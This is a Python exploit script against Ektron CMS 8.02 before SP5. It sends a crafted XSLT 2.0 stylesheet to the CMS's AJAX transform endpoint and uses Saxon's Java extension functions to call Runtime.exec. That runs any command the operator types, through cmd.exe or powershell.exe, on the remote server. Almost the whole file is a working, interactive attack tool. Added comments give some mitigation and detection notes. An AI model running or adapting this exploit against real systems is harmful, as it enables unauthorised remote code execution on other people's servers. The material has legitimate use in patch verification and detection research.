############################################################################################
### Exploit for Ektron CMS 8.02 before SP5. This exploit takes advantage of the
### built-in Saxon XSLT 2.0 processor and executes a command on the remote host
### through Java embedded extension code, as opposed to C# scripting through
### Microsoft's XSLT engine.
### ###
### This is particularly useful for when Microsoft's EnableScript is set to False. ###
### ###
### Author : Tom Kallo (Hunnic Cyber Limited) ###
############################################################################################
#! /usr/bin/python
import httplib
# Interactive operator inputs (Python 2 raw_input returns str).
# target/port are handed straight to httplib.HTTPConnection below with no
# validation; process/command are interpolated verbatim into the XML payload,
# so a quote, '<' or '&' in either would break the stylesheet rather than be escaped.
target = raw_input("""Enter the domain or IP address of target:
e.g. www.google.com, or 198.162.0.1: """)
port = raw_input("""Enter port number of target
e.g. 80 or 443: """)
process = raw_input("""Enter the process you wish to run:
powershell.exe or cmd.exe: """)
command = raw_input("""Enter command you wish to run:
e.g. ping 127.0.0.1: """)
def printText(txt):
    """Print every newline-separated line of txt with surrounding whitespace stripped.

    Used below to echo the HTTP response body; trailing newlines in txt produce
    an extra empty line, exactly as str.split('\n') yields them.
    """
    for chunk in txt.split('\n'):
        print(chunk.strip())
# Open a TCP connection to the operator-supplied host/port. The only traffic
# that follows is a single POST (below), which is the unit a network sensor
# would see.
httpServ = httplib.HTTPConnection( target, port)
httpServ.connect()
# Request body: a form field `xslt` whose value is an XSLT 2.0 stylesheet.
# The stylesheet declares Saxon's java-type namespace and binds the `Runtime`
# prefix to java.lang.Runtime, so the server-side processor's Java extension
# mechanism resolves Runtime:getRuntime()/Runtime:exec as extension functions.
# Defender notes:
#  - Mitigation: an XSLT processor fed user-supplied stylesheets must have
#    extension functions / Java reflection disabled (the header above states the
#    vendor addressed this in SP5).
#  - Detection: a request body to the endpoint below containing an
#    <xsl:stylesheet> that references a java: or saxon.sf.net/java-type
#    namespace is a high-signal indicator.
payload = """
xslt=<?xml version="1.0"?>
<xsl:stylesheet version="2.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:java="http://saxon.sf.net/java-type">
<xsl:template match="/">
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'%s /C %s')"
xmlns:Runtime="java:java.lang.Runtime"/>
</xsl:template>
</xsl:stylesheet>""" % (process,command)
# The body is sent exactly as built above, with a form-urlencoded Content-type.
# The target endpoint is the CMS's AJAX transform handler; access logs for POSTs
# to this path are the place to look when hunting for this activity.
headers = {"Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "application/x-www-form-urlencoded; charset=UTF-8"}
httpServ.request('POST', '/WorkArea/ContentDesigner/ekajaxtransform.aspx', payload, headers)
response = httpServ.getresponse()
# On HTTP 200 the transform output is echoed line by line. The label suggests the
# output is whatever Runtime.exec returned for the spawned process — NOTE(review):
# cannot confirm the exact response format from this file alone.
if response.status == httplib.OK:
    print "Java Process Id: "
    printText (response.read())
httpServ.close()